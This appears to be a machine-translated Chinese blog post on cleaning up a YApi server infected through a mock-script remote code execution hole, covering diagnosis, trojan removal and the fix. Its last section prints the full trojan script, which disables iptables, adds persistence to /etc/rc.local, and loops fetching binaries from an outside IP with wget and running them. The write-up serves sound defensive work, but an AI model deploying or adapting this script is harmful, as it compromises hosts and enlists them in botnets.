当前位置:网站首页>Yapi vulnerability hanging horse program chongfu.sh processing
Yapi vulnerability hanging horse program chongfu.sh processing
2022-07-28 06:47:00 【opreator.ke】
One .【 background 】 The server network is stuck , Frequent external contracting , Cause the server network to crash .
Two .【 screening 】
2.1 Log in to the exception server , adopt top No abnormal CPU Memory anomalies .
2.2 Check the network
netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'
No abnormality found , It's all normal tcp Connection status .
2.3 tcpdump command Caught analysis
tcpdump -i enp3s0
14:53:48.496584 IP smtp-5.etopbags.info.dnp > 218.46046: Flags [R.], seq 0, ack 3002381902, win 0, length 0
14:53:48.496825 IP 218.46048 > smtp-5.etopbags.info.dnp: Flags [S], seq 361520383, win 29200, options [mss 1460,sackOK,TS val 2043795 ecr 0,nop,wscale 7], length 0
14:53:48.536622 IP smtp-5.etopbags.info.dnp > 218.46048: Flags [R.], seq 0, ack 361520384, win 0, length 0
14:53:48.536876 IP 218.46050 > smtp-5.etopbags.info.dnp: Flags [S], seq 914055455, win 29200, options [mss 1460,sackOK,TS val 2043836 ecr 0,nop,wscale 7], length 0
14:53:48.574447 IP smtp-5.etopbags.info.dnp > 218.46050: Flags [R.], seq 0, ack 914055456, win 0, length 0
14:53:48.574644 IP 218.46052 > smtp-5.etopbags.info.dnp: Flags [S], seq 908877290, win 29200, options [mss 1460,sackOK,TS val 2043873 ecr 0,nop,wscale 7], length 0
14:53:48.609252 IP smtp-5.etopbags.info.dnp > 218.46052: Flags [R.], seq 0, ack 908877291, win 0, length 0
14:53:48.609342 IP 218.46054 > smtp-5.etopbags.info.dnp: Flags [S], seq 3724761583, win 29200, options [mss 1460,sackOK,TS val 2043908 ecr 0,nop,wscale 7], length 0
14:53:48.646988 IP smtp-5.etopbags.info.dnp > 218.46054: Flags [R.], seq 0, ack 3724761584, win 0, length 0
14:53:48.647066 IP 218.46056 > smtp-5.etopbags.info.dnp: Flags [S], seq 1209043513, win 29200, options [mss 1460,sackOK,TS val 2043946 ecr 0,nop,wscale 7], length 0
14:53:48.681432 IP smtp-5.etopbags.info.dnp > 218.46056: Flags [R.], seq 0, ack 1209043514, win 0, length 0
14:53:48.681516 IP 218.46058 > smtp-5.etopbags.info.dnp: Flags [S], seq 1382946052, win 29200, options [mss 1460,sackOK,TS val 2043980 ecr 0,nop,wscale 7], length 0
14:53:48.722538 IP smtp-5.etopbags.info.dnp > 218.46058: Flags [R.], seq 0, ack 1382946053, win 0, length 0
14:53:48.722614 IP 218.46060 > smtp-5.etopbags.info.dnp: Flags [S], seq 572251828, win 29200, options [mss 1460,sackOK,TS val 2044021 ecr 0,nop,wscale 7], length 0
14:53:48.759004 IP smtp-5.etopbags.info.dnp > 218.46060: Flags [R.], seq 0, ack 572251829, win 0, length 0
14:53:48.759089 IP 218.46064 > smtp-5.etopbags.info.dnp: Flags [S], seq 3797818250, win 29200, options [mss 1460,sackOK,TS val 2044058 ecr 0,nop,wscale 7], length 0
Exception found , Always on the outside smtp-5.etopbags.info.dnp , Send message
2.4 Found through the packet capturing tool , Target port 20000 Has been receiving messages 
2.5
netstat -lan |grep 20000
Check the process of this listening port , Found to be yapi A program of is executing .
/root/my-yapi/20000 This process is executing
Enter this directory , Abnormal file found .
3、 ... and 【 Trojan cleaning 】
Refer to this cleanup document
https://zhuanlan.zhihu.com/p/90792899
3.1 The end of the process ps aux | grep “20000” | grep -v grep | awk ‘{print $2}‘| xargs kill -9
3.2 Clear auto start script vim /etc/rc.local Get rid of sh /etc/chongfu.sh &
3.3 eliminate Script rm -rf /etc/chongfu.sh /tem/chongfu.sh
3.4 Change login password passwd
3.5 restart . reboot
good heavens , Follow up finding , This trojan horse is particularly stubborn .
Used multiple system file names to disguise , At the same time, it is associated with multiple timed repeating scripts . After complete cleaning , Processed .
Four 【 Locating vulnerabilities 】
4.1 Why is it in yapi Trojan files are generated in the directory of ?
4.2 This server is an intranet server , The password and port have security policies .
4.3 Start locating the problem , land yapi Administrator account , Found a large number of abnormal registrant information .
Hurry up and land github Look at the 
Then I found
http://www.hackdig.com/07/hack-404188.htm
because YAPI Remote code execution 0day There is no patch for the vulnerability ,BillGates Botnets and Mirai The botnet Trojan horse family mainly uses the controlled host to DDoS attack 、 Leave the back door or carry out mining operations . Tencent security experts suggest YAPI The government and enterprise organizations of the interface management platform shall take the following measures to mitigate the vulnerability risk as soon as possible :
1. Deploy Tencent cloud firewall to intercept threats in real time ;
2. close YAPI User registration function , To block the attacker from registering ;
3. Delete malicious registered users , Prevent attackers from adding... Again mock Script ;
4. Delete malicious mock Script , Prevent from being triggered by access again ;
5. The server rolls back the snapshot , It can clear the backdoor of exploit implantation .
5、 ... and 【yapi Problem fix 】
5.1 Give priority to removing the Internet address .
5.2 according to github The advice of , The user registration is closed .
6、 ... and 【 Trojan program disk 】
6.1 The attacker first registers the function and first registers the account , You can customize your account only after you log in mock Script .
6.2 Through mock Malicious commands are embedded in the script , To be accessed by the user mock Command execution is triggered when the interface initiates a request .
Then the above scene appeared .
6.3 Trojan script
#!/bin/bash
#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
# qun:10776622
# 2016-06-14
iptables -F
/etc/init.d/iptables stop
chkconfig iptables off
echo "chmod +x /tmp/X64" >> /etc/rc.local
echo "/tmp/X64 SHX64" >> /etc/rc.local
echo "chmod +x /tmp/ShouHu" >> /etc/rc.local
echo "/tmp/ShouHu SHX64" >> /etc/rc.local
m=X64 SHX64
script=ShouHu SHX64
hfs_m=http://27.50.49.61:2131/X64
hfs_s=http://27.50.49.61:2131/ShouHu
rm -f /tmp/$m*
while true
do
ps aux | grep $m | grep -v grep
if [ $? -eq 0 ];then
sleep 10
else
ls -l /tmp/$m
if [ $? -eq 0 ];then
/tmp/$m
else
cd /tmp/;wget $hfs_m ; chmod a+x $m;/tmp/$m
fi
fi
ps aux | grep $script | grep -v grep
if [ $? -eq 0 ];then
sleep 10
else
ls -l /tmp/$script
if [ $? -eq 0 ];then
/tmp/$script
else
cd /tmp;wget $hfs_s ; chmod a+x $script;/tmp/$script
fi
fi
done
边栏推荐
猜你喜欢
Source code analysis of countdownlatch of AQS
水瓶效果制作
Optimization ideas from ordinary query commodities to highly concurrent query commodities
Graphic pipeline foundation (part outside)
JS逆向100题——第1题
![[PTA----树的遍历]](/img/d8/260317b30d624f8e518f8758706ab9.png)
[PTA----树的遍历]
mysql索引优化
![[pta-- use queues to solve the problem of monkeys choosing kings]](/img/54/94359fb3557ac07f7786ecf61a5409.png)
[pta-- use queues to solve the problem of monkeys choosing kings]
Mongodb replica set and partitioned cluster
[PTA--利用队列解决猴子选大王问题】
随机推荐
[hash table basics]
Implementation of simple address book in [c language]
yapi漏洞挂马程序chongfu.sh处理
[PTA----输出全排列]
Leetcode brush question diary sword finger offer II 055. binary search tree iterator
OJ 1253 ordering problem
【C笔记】数据类型及存储
Bug experience related to IAP jump of stm32
Pyppeter drop-down selenium drop-down
[PTA----树的遍历]
Problem solving for ACM freshmen in Jiangzhong on October 26
mongoDB复制集及分片集群
Using C language to realize three piece chess games
代码整洁之道(二)
Valgrind tool
[c language] - step by step to achieve minesweeping games
Development of clip arbitrage / brick carrying arbitrage system
AQS之semaphore源码分析
Ready to start blogging
水渲染示例